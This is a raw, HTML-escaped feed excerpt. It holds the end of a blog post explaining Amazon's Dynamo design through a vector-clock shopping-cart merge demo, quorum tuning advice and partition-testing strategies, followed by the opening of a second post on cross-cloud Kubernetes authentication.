            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;  Version &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;v&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;  clock=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;v&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Application-level resolution: union merge (Amazon's shopping cart strategy)
&lt;/span&gt;        &lt;span class="c1"&gt;# Merge items: take the union so no addition is lost
&lt;/span&gt;        &lt;span class="n"&gt;all_items&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;set&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="n"&gt;merged_clock&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="n"&gt;vector_clock&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;v&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;all_items&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;update&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;v&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;items&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
            &lt;span class="n"&gt;merged_clock&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;merged_clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;merge&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;v&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="n"&gt;merged_value&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;items&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nf"&gt;sorted&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;all_items&lt;/span&gt;&lt;span class="p"&gt;)}&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;Merged result: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;merged_value&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Write the resolved version back with the merged clock as context.
&lt;/span&gt;        &lt;span class="c1"&gt;# This "closes" the conflict — future reads will see a single version.
&lt;/span&gt;        &lt;span class="n"&gt;final_ctx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;dynamo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;put&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;cart:user-99&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;merged_value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;merged_clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="n"&gt;versions&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;dynamo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;cart:user-99&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;After resolution: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;assert&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Should be a single version after merge&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;


&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="nf"&gt;demo&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Expected output:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;=======================================================
SCENARIO 1: Normal write and read (no conflict)
=======================================================
[PUT] key='cart:user-42'  value={'items': ['shoes']}  clock=VectorClock({'node-A': 1})  (3/3 nodes wrote)
[GET] key='cart:user-42'  status=clean  (3/3 nodes responded)
Read result: {'items': ['shoes']}

[PUT] key='cart:user-42'  value={'items': ['shoes', 'jacket']}  clock=VectorClock({'node-A': 2})  (3/3 nodes wrote)
[GET] key='cart:user-42'  status=clean  (3/3 nodes responded)
After update: {'items': ['shoes', 'jacket']}

=======================================================
SCENARIO 2: Simulated conflict — two concurrent writes
=======================================================
[PUT] key='cart:user-99'  value={'items': ['hat']}  clock=VectorClock({'node-A': 1})  (3/3 nodes wrote)

[GET] key='cart:user-99'  status=CONFLICT (2 versions)  (3/3 nodes responded)

Conflict detected! 2 concurrent versions:
  Version 1: {'items': ['hat', 'scarf']}  clock=VectorClock({'node-A': 2})
  Version 2: {'items': ['hat', 'gloves']}  clock=VectorClock({'node-A': 1, 'node-B': 1})

Merged result: {'items': ['gloves', 'hat', 'scarf']}
[PUT] key='cart:user-99'  value={'items': ['gloves', 'hat', 'scarf']}  ...  (3/3 nodes wrote)
[GET] key='cart:user-99'  status=clean  (3/3 nodes responded)

After resolution: {'items': ['gloves', 'hat', 'scarf']}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;What to notice:&lt;/strong&gt; In Scenario 2, the coordinator correctly identifies that &lt;code&gt;{'node-A': 2}&lt;/code&gt; and &lt;code&gt;{'node-A': 1, 'node-B': 1}&lt;/code&gt; are neither equal nor in a dominance relationship — neither is an ancestor of the other — so both are surfaced as concurrent. The application then takes responsibility for merging them and writing back a resolved version with the merged clock.&lt;/p&gt;

&lt;h2&gt;
  
  
  Key Lessons for System Design
&lt;/h2&gt;

&lt;p&gt;After working with Dynamo-inspired systems for years, here are my key takeaways:&lt;/p&gt;

&lt;h3&gt;
  
  
  1. &lt;strong&gt;Always-On Beats Strongly-Consistent&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;For user-facing applications, availability almost always wins. Users will tolerate seeing slightly stale data. They won't tolerate "Service Unavailable."&lt;/p&gt;

&lt;h3&gt;
  
  
  2. &lt;strong&gt;Application-Level Reconciliation is Powerful&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Don't be afraid to push conflict resolution to the application. The application understands the business logic and can make smarter decisions than the database ever could.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. &lt;strong&gt;Tunable Consistency is Essential&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;One size doesn't fit all. Shopping cart additions need high availability (W=1). Financial transactions need stronger guarantees (W=N). The ability to tune this per-operation is incredibly valuable.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. &lt;strong&gt;The 99.9th Percentile Matters More Than Average&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Focus your optimization efforts on tail latencies. That's what users actually experience during peak times.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. &lt;strong&gt;Gossip Protocols Scale Beautifully&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Decentralized coordination via gossip eliminates single points of failure and scales to thousands of nodes.&lt;/p&gt;

&lt;h2&gt;
  
  
  When NOT to Use Dynamo-Style Systems
&lt;/h2&gt;

&lt;p&gt;Be honest about trade-offs. Don't use this approach when:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Strong consistency is required&lt;/strong&gt; (financial transactions, inventory management)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Complex queries are needed&lt;/strong&gt; (reporting, analytics, joins)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Transactions span multiple items&lt;/strong&gt; (Dynamo is single-key operations only)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Your team can't handle eventual consistency&lt;/strong&gt; (if developers don't understand vector clocks and conflict resolution, you'll have problems)&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Dynamo represents a fundamental shift in how we think about distributed systems. By embracing eventual consistency and providing tunable trade-offs, it enables building systems that scale to massive sizes while maintaining high availability.&lt;/p&gt;

&lt;p&gt;The paper's lessons have influenced an entire generation of distributed databases. Whether you're using Cassandra, Riak, or DynamoDB, you're benefiting from the insights first published in this paper.&lt;/p&gt;

&lt;p&gt;As engineers, our job is to understand these trade-offs deeply and apply them appropriately. Dynamo gives us a powerful tool, but like any tool, it's only as good as our understanding of when and how to use it.&lt;/p&gt;

&lt;h2&gt;
  
  
  Further Reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Original Dynamo Paper: &lt;a href="https://www.allthingsdistributed.com/files/amazon-dynamo-sosp2007.pdf" rel="noopener noreferrer"&gt;SOSP 2007&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Werner Vogels' Blog: &lt;a href="https://www.allthingsdistributed.com/" rel="noopener noreferrer"&gt;All Things Distributed&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Cassandra Documentation: Understanding how these concepts are implemented&lt;/li&gt;
&lt;li&gt;"Designing Data-Intensive Applications" by Martin Kleppmann - Chapter 5 on Replication&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Appendix: Design Problems and Approaches
&lt;/h2&gt;

&lt;p&gt;Three open-ended problems that come up in system design interviews and real engineering work. Think through each before reading the discussion.&lt;/p&gt;

&lt;h3&gt;
  
  
  Problem 1: Conflict Resolution for a Collaborative Document Editor
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;The problem&lt;/strong&gt;: You're building something like Google Docs backed by a Dynamo-style store. Two users edit the same paragraph simultaneously. How do you handle the conflict?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why shopping cart union doesn't work here&lt;/strong&gt;: The shopping cart strategy (union of all items) is only safe because adding items is commutative — &lt;code&gt;{A} ∪ {B} = {B} ∪ {A}&lt;/code&gt;. Text editing is not commutative. If User A deletes a sentence and User B edits the middle of it, the union of their changes is meaningless or contradictory.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The right approach: Operational Transformation (OT) or CRDTs&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The industry solution is to represent the document not as a blob of text, but as a sequence of operations, and to transform concurrent operations so they can both be applied without conflict:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;User A's operation: delete(position=50, length=20)
User B's operation: insert(position=60, text="new sentence")

Without OT: B's insert position (60) is now wrong because A deleted 20 chars.
With OT:    Transform B's operation against A's:
            B's insert position shifts to 40 (60 - 20).
            Both operations now apply cleanly.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The conflict resolution strategy for the Dynamo layer would be:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Store operations (not full document snapshots) as the value for each key.&lt;/li&gt;
&lt;li&gt;On conflict, collect all concurrent operation lists from each version.&lt;/li&gt;
&lt;li&gt;Apply OT to merge them into a single consistent operation log.&lt;/li&gt;
&lt;li&gt;Write the merged log back with the merged vector clock as context.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;What to store in Dynamo&lt;/strong&gt;: The operation log per document segment, not the rendered text. This makes merges deterministic and lossless.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Real-world reference&lt;/strong&gt;: This is essentially how Google Docs, Notion, and Figma work. Their storage layers use either OT or a variant of CRDTs (Conflict-free Replicated Data Types), which are data structures mathematically guaranteed to merge without conflicts regardless of operation ordering.&lt;/p&gt;

&lt;h3&gt;
  
  
  Problem 2: Choosing N, R, W for Different Use Cases
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;The problem&lt;/strong&gt;: What configuration would you pick for (a) a session store, (b) a product catalog, (c) user profiles?&lt;/p&gt;

&lt;p&gt;The right way to think about this: identify the failure mode that costs more — a missed write (data loss) or a rejected write (unavailability). Then pick quorum values accordingly.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Session store — prioritize availability&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Sessions are temporary and user-specific. If a user's session is briefly stale or lost, they get logged out and log back in. That's annoying but not catastrophic. You never want to reject a session write.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;N=3, R=1, W=1

Rationale:
- W=1: Accept session writes even during heavy failures.
        A user can't log in if their session write is rejected.
- R=1: Read from any single node. Stale session data is harmless.
- N=3: Still replicate to 3 nodes for basic durability.

Trade-off accepted: Stale session reads are possible but inconsequential.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Product catalog — prioritize read performance and consistency&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Product data is written rarely (by ops teams) but read millions of times per day. Stale prices or descriptions are problematic. You want fast, consistent reads.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;N=3, R=2, W=3

Rationale:
- W=3: All replicas must confirm a catalog update before it's live.
        A price change half-published is worse than a brief write delay.
- R=2: Read quorum overlap with W=3 guarantees fresh data.
        Acceptable: catalog writes are rare, so write latency doesn't matter.
- N=3: Standard replication for durability.

Trade-off accepted: Writes are slow and fail if any node is down.
                    Acceptable because catalog updates are infrequent.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;User profiles — balanced&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Profile data (name, email, preferences) is moderately important. A stale profile is annoying but not dangerous. A rejected update (e.g., user can't update their email) is a real problem.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;N=3, R=2, W=2

Rationale:
- The classic balanced configuration.
- R + W = 4 &amp;gt; N = 3, so quorums overlap: reads will see the latest write.
- Tolerates 1 node failure for both reads and writes.
- Appropriate for data that matters but doesn't require strict consistency.

Trade-off accepted: A second simultaneous node failure will cause errors.
                    Acceptable for non-critical user data.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Decision framework summary:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Priority&lt;/th&gt;
&lt;th&gt;R&lt;/th&gt;
&lt;th&gt;W&lt;/th&gt;
&lt;th&gt;When to use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Max availability&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Sessions, ephemeral state, click tracking&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Balanced&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;User profiles, preferences, soft state&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Consistent reads&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Catalogs, config, rarely-written reference data&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Highest consistency&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Anywhere you need R+W &amp;gt; N with zero tolerance for stale reads (still not linearizable)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Problem 3: Testing a Dynamo-Style System Under Partition Scenarios
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;The problem&lt;/strong&gt;: How do you verify that your system actually behaves correctly when nodes fail and partitions occur?&lt;/p&gt;

&lt;p&gt;This is one of the hardest problems in distributed systems testing because the bugs only appear in specific interleavings of concurrent events that are difficult to reproduce deterministically.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Layer 1: Unit tests for the logic in isolation&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Before testing distributed behavior, verify the building blocks independently. Vector clock comparison logic, conflict detection, and reconciliation functions can all be tested with pure unit tests — no networking needed.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_concurrent_clocks_detected_as_conflict&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="n"&gt;clock_a&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;node-A&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;})&lt;/span&gt;
    &lt;span class="n"&gt;clock_b&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;node-B&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;})&lt;/span&gt;
    &lt;span class="k"&gt;assert&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;clock_a&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;dominates&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;clock_b&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;assert&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;clock_b&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;dominates&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;clock_a&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="c1"&gt;# Both survive reconciliation → conflict correctly detected
&lt;/span&gt;
&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_ancestor_clock_is_discarded&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="n"&gt;old_clock&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;node-A&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;})&lt;/span&gt;
    &lt;span class="n"&gt;new_clock&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;node-A&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;})&lt;/span&gt;
    &lt;span class="k"&gt;assert&lt;/span&gt; &lt;span class="n"&gt;new_clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;dominates&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;old_clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="c1"&gt;# old_clock should be pruned during reconciliation
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Layer 2: Deterministic fault injection&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Rather than hoping failures happen in the right order during load testing, inject them deliberately and repeatably. In the demo implementation above, &lt;code&gt;node.down = True&lt;/code&gt; is a simple version of this. In production systems, libraries like &lt;a href="https://jepsen.io/" rel="noopener noreferrer"&gt;Jepsen&lt;/a&gt; or &lt;a href="https://netflix.github.io/chaosmonkey/" rel="noopener noreferrer"&gt;Chaos Monkey&lt;/a&gt; do this at the infrastructure level.&lt;/p&gt;

&lt;p&gt;Key scenarios to test:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Scenario A: Write succeeds with W=2, third replica is down.
  → Verify: the data is readable after the down node recovers.
  → Verify: no data loss occurred.

Scenario B: Two nodes accept concurrent writes to the same key.
  → Verify: the next read surfaces exactly 2 conflicting versions.
  → Verify: after the application writes a merged version, the next read is clean.

Scenario C: Node goes down mid-write (wrote to W-1 nodes).
  → Verify: the write is correctly rejected (RuntimeError).
  → Verify: no partial writes are visible to readers.

Scenario D: All N nodes recover after a full partition.
  → Verify: no data was lost across the cluster.
  → Verify: vector clocks are still meaningful (no spurious conflicts).
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Layer 3: Property-based testing&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Instead of writing individual test cases, define &lt;em&gt;invariants&lt;/em&gt; that must always hold and generate thousands of random operation sequences to try to violate them:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Invariant: after any sequence of writes and merges, a final get()
# should always return exactly one version (no unresolved conflicts).
&lt;/span&gt;
&lt;span class="c1"&gt;# Invariant: a value written with a context derived from a previous read
# should never produce a conflict with that read's version
# (it should dominate it).
&lt;/span&gt;
&lt;span class="c1"&gt;# Invariant: if R + W &amp;gt; N, a value written successfully should always
# be visible in the next read (read-your-writes, absent concurrent writes).
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Tools like &lt;a href="https://hypothesis.readthedocs.io/" rel="noopener noreferrer"&gt;Hypothesis&lt;/a&gt; (Python) let you express these invariants and automatically find counterexamples.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Layer 4: Linearizability checkers&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;For the highest confidence, record every operation's start time, end time, and result during a fault injection test, then feed the history to a linearizability checker like &lt;a href="https://github.com/jepsen-io/knossos" rel="noopener noreferrer"&gt;Knossos&lt;/a&gt;. It will tell you whether any observed history is consistent with a correct sequential execution — even for an eventually-consistent system operating within its stated guarantees.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Written from the trenches of distributed systems. Battle-tested insights, zero hand-waving.&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;Originally published at &lt;a href="https://platformwale.blog" rel="noopener noreferrer"&gt;https://platformwale.blog&lt;/a&gt;&lt;/p&gt;

</description>
      <category>distributedsystems</category>
      <category>aws</category>
      <category>dynamodb</category>
      <category>cloud</category>
    </item>
    <item>
      <title>Cross-Cloud Authentication in Kubernetes: A Comprehensive Guide to IRSA, Workload Identity, and Federated Identity</title>
      <dc:creator>Piyush Jajoo</dc:creator>
      <pubDate>Fri, 13 Feb 2026 00:32:27 +0000</pubDate>
      <link>https://dev.to/piyushjajoo/cross-cloud-authentication-in-kubernetes-a-comprehensive-guide-to-irsa-workload-identity-and-40en</link>
      <guid>https://dev.to/piyushjajoo/cross-cloud-authentication-in-kubernetes-a-comprehensive-guide-to-irsa-workload-identity-and-40en</guid>
      <description>&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;In modern cloud-native architectures, it's increasingly common to run workloads in one cloud provider while needing to access resources in another. Whether you're running a multi-cloud strategy, migrating between providers, or building a distributed system, your Kubernetes pods need secure, passwordless authentication across AWS, Azure, and GCP.&lt;/p&gt;

&lt;p&gt;This guide demonstrates how to implement cross-cloud authentication using industry best practices:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;AWS IRSA&lt;/strong&gt; (IAM Roles for Service Accounts)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Azure Workload Identity&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;GCP Workload Identity Federation&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We'll cover three real-world scenarios:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Pods running in &lt;strong&gt;EKS&lt;/strong&gt; authenticating to AWS, Azure, and GCP&lt;/li&gt;
&lt;li&gt;Pods running in &lt;strong&gt;AKS&lt;/strong&gt; authenticating to AWS, Azure, and GCP&lt;/li&gt;
&lt;li&gt;Pods running in &lt;strong&gt;GKE&lt;/strong&gt; authenticating to AWS, Azure, and GCP&lt;/li&gt;
&lt;/ol&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Important Note:&lt;/strong&gt; These scenarios rely on Kubernetes Bound Service Account Tokens (available in Kubernetes 1.24+). Legacy auto-mounted tokens will not work for federation.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
